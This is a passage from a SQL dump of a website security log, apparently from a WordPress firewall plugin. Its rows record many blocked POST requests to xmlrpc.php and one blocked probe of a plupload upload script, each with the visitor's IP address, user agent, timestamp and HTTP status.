Safari\\/537.36\"}','dpQeDx5qaT3PcsyfO0lLHAuz',0,1680927321.2952,555,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','Jxv8mKCyqQSlsOXkN5BcF0Yo',0,1680927323.1931,568,'','POST',403,0,515,0,1,'',0),('199.249.230.47',3355043375,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hRDQTbjE5vmLYVpnsNB9KXcd',0,1680928220.8164,3462,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Pn4HLJ0vmw2KDtUyNEVdoGu6',0,1680929711.7765,3469,'','POST',403,0,515,0,1,'',0),('185.156.175.51',3114053427,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','03O1qoJdEetPjRv8NrhiVLGp',0,1680929808.0895,552,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bvfmr60VFg31LwpKJsyCaWMU',0,1680930530.4081,3963,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9mbgdwAC7JKTGVzfjiYxZv1W',0,1680930566.4385,553,'','POST',403,0,515,0,1,'',0),('37.120.155.179',628661171,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5LbvFTZEAH6jat1G3POsegnh',0,1680930887.0473,3939,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PZuhdfSmb7rnDVT6I0UoLiMG',0,1680932143.1785,721,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vhqAO413KiDV2fBExNS0egUl',0,1680932283.3852,756,'','POST',403,0,515,0,1,'',0),('141.98.102.235',2372036331,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tcYlrPBnRQM02X6SN3zW4xbZ',0,1680932313.4676,573,'','POST',403,0,515,0,1,'',0),('141.98.102.235',2372036331,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oI4fq7rkUeLJgPcXAsOh6D5m',0,1680932375.2543,563,'','POST',403,0,515,0,1,'',0),('213.152.162.99',3583550051,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NwnzlDP14xT9HtZRqeEShF6d',0,1680932995.4870,3863,'','POST',403,0,515,0,1,'',0),('199.249.230.42',3355043370,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Tk7RgQO5YP0ZXinjtdJveErs',0,1680933736.9217,3274,'','POST',403,0,515,0,1,'',0),('79.170.40.178',1336551602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','PGv1N3TmtF96f7isCS4pAlqM',0,1680934164.7765,2712,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','7UjZIJMrlmXLdDEzYyVpK5Cv',0,1680934172.4467,1616,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','3qRp76EL9SO4XoIQF28tJamG',0,1680934188.4521,2158,'','POST',403,0,515,0,1,'',0),('46.101.182.98',778417762,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tsNErHVCFcx4I2zJ0PR3gwpL',0,1680934188.1396,2471,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','7elRiIJHzwWNthxSD5A4bMkT',0,1680934186.7490,4036,'','POST',403,0,515,0,1,'',0),('185.79.156.242',3109002482,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','V5kOx4E0tGZ37qBU6DpXfw8M',0,1680934192.9737,591,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','O6W4ULovgu8VENBtmnsc9TP7',0,1680934196.0319,1743,'','POST',403,0,515,0,1,'',0),('92.204.220.74',1556929610,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','jzSi7BGr3TCl2duVfNJePQvb',0,1680934203.2568,2606,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','6lc1HyO5Ps8KxBfhbe4p32Uj',0,1680934205.5518,917,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','qKfHiGFWcsZXtugmlPE0CM2p',0,1680934209.1898,621,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sbv3VaMAj5HPtGlNqBurngSm',0,1680934449.8980,5846,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','erU0tsX1Amvgkp5h4xMqODQi',0,1680936623.8872,1803,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','zIJg4NKG3r6lQjiTwDCAmfhO',0,1680936621.4751,4710,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','ruMBcjlS9XR73gZhveJ0TLCd',0,1680936638.2732,593,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','jNkYnHB98hiXSJLRdCzpo342',0,1680936639.4187,585,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','AGahus5rvBUkP0RHEdxljiLZ',0,1680936646.3727,629,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','OW1HILGRcqkJB7TAMX6Nb0sh',0,1680936649.3428,586,'','POST',403,0,515,0,1,'',0),('192.111.150.75',3228538443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','UoIMtnju2aBXrsA8mvGfLSRw',0,1680936651.8046,602,'','POST',403,0,515,0,1,'',0),('164.132.84.209',2760135889,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','VbzUjRid7KYXysCJZl3TE0rP',0,1680936654.8802,626,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','y6oBgYubM7qARa8JXWDtQC5c',0,1680936662.4392,664,'','POST',403,0,515,0,1,'',0),('85.25.213.84',1427756372,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','mENkP3bTwy5QoGxWOIvRK6X8',0,1680936663.9029,580,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/public/assets/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','4zuocZd8pymtP3QLH6aSEYfs',0,1680938144.8128,2134,'','GET',403,0,700,0,1,'',0),('94.198.43.36',1590045476,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','rM4VDxnASi2f350Q8aNmuyBI',0,1680939322.7968,567,'','POST',403,0,515,0,1,'',0),('94.198.43.36',1590045476,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','a3u2ARIDkKBhcoMiXwrbp45y',0,1680939326.4100,588,'','POST',403,0,515,0,1,'',0),('94.198.43.36',1590045476,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','6oIqLaJwDf5SWBRQgnyCecX1',0,1680939327.6007,390,'','POST',404,0,515,0,1,'',0),('79.170.40.178',1336551602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','z8VqJRpa1i5fXwOGkChHuEbK',0,1680941403.3602,1682,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','7mn0Z98T1WJShfrYlMNGCoeA',0,1680941405.9379,640,'','POST',403,0,515,0,1,'',0),('192.30.89.59',3223214395,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uNlUFrSIngHhk8Bc3TMZAyPq',0,1680942113.9382,3573,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PGHCTEKVNvlq0JOc29rgYFsU',0,1680942987.7965,3495,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NQEH8g9eJl7w10oy3iIqzC2R',0,1680943303.6842,3984,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','NKUs5FBcl6RnE13vtPyLIwZY',0,1680943359.2723,2584,'','POST',403,0,515,0,1,'',0),('51.195.105.117',868444533,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','5iA1ZDy29CKsbRYupore4VGd',0,1680943360.9382,1253,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','1SaTAXDo7c8Wy6Rqb43KeuvV',0,1680943371.4122,611,'','POST',403,0,515,0,1,'',0),('103.3.1.158',1728250270,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','O9dAItTEVNsw3hRJbM2vDn7Y',0,1680943383.7149,571,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','CsNk3pxXILVvUB7rZ62bfgio',0,1680943385.1293,577,'','POST',403,0,515,0,1,'',0),('185.98.5.146',3110208914,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','yNf84DXnv2epsJR5WOPZLAIq',0,1680943390.6343,631,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','e18uvXHtJoCQpFZ7kBK0OV6d',0,1680943395.4882,568,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ydeanRQfO2F1VYpLtMAk5zub',0,1680943733.1130,3926,'','POST',403,0,515,0,1,'',0),('51.77.231.194',860743618,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','jWOpHM7bIxi9wvm4FaJqToPB',0,1680945094.9961,1739,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','2orIvTqQCS0epNyjsx9f6a7J',0,1680945093.0644,4273,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','r1fjHdEk2J6wqKlIUPz5LTVC',0,1680945106.6050,603,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','1XlBewNj6RYqnUfpJyGmCthO',0,1680945110.1344,596,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','sBIqNES1oeQrpfOKZ5MG4l36',0,1680945117.9937,585,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','5rv1Fq6MGpJXfb2ythWLuleP',0,1680945119.0823,568,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','bWOKr1MFphgRoZ7lSyf264uk',0,1680945129.5843,659,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','uUGWcR8rfZQxjetovs16pKXL',0,1680945136.6354,621,'','POST',403,0,515,0,1,'',0),('185.156.175.51',3114053427,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IpSqyO5Udh2u3avz76PnX8Fw',0,1680946298.1987,3678,'','POST',403,0,515,0,1,'',0),('62.102.148.158',1046910110,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8FlLQIZ9twBXebAfJTuh0YPk',0,1680946439.9971,625,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','oVsIrjhSdyWukziTmfgA6D3N',0,1680946862.9981,1651,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','bgN3eWpGo1Z02HUk95hX6dRf',0,1680946861.2757,3696,'','POST',403,0,515,0,1,'',0),('147.135.161.89',2475139417,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','l0i3OWgZNmQFyufz2eJEdSTH',0,1680946867.6175,572,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','5L6nKXetI4YdSlBH81wJMQiD',0,1680946872.0027,561,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','VI9wmLQ7MnaYhN152dTfRZvg',0,1680946884.9547,578,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','uBzUM79yZlwKhAjFWmaveprJ',0,1680946886.5176,591,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','ZJk9VRdt3Q7LPs560oylxhM4',0,1680946888.2489,564,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','7CR2Swni1gWeaUqE86FZxKJd',0,1680946895.4510,566,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','eG6Xxf9MA7nEc3QPLDl2V1UY',0,1680946901.5845,567,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','5urK4zSFpWy1BH7iQMEdcqwA',0,1680946904.6640,583,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lGr5OMi19mHkZcJe4Q8DF0LB',0,1680948147.5739,3924,'','POST',403,0,515,0,1,'',0),('156.96.151.132',2623575940,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','yt0unKa6r2dcYReOTPM7CGUo',0,1680949360.8055,3959,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Cui5rjDPHxMyOaFlKcEohU3L',0,1680951224.4011,1542,'','POST',403,0,515,0,1,'',0),('213.152.161.181',3583549877,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8IfBUhnuotp2dk7bP6MNSsQJ',0,1680951273.8818,605,'','POST',403,0,515,0,1,'',0),('82.102.28.107',1382423659,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9mJP5Kt8Ec6uIBwlahvZTz0W',0,1680951849.4665,1379,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','ay9YEzJtid2xQbseL4wH6Gno',0,1680951936.3064,1650,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','QS3dEsW4NqOFiMZKo1YCabLB',0,1680951948.1111,616,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','AqmiaQOZCHRjhSXM3956GEWo',0,1680951951.4161,766,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','KzshmRiVJAWj3SX10g62GTlE',0,1680951952.1580,693,'','POST',403,0,515,0,1,'',0),('92.204.220.74',1556929610,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','TijI3OSrXzgqhdcQ0y8JE2C9',0,1680951955.5615,623,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','JaPCyNc6KjWHdvofSG8TbXwe',0,1680951960.6962,773,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 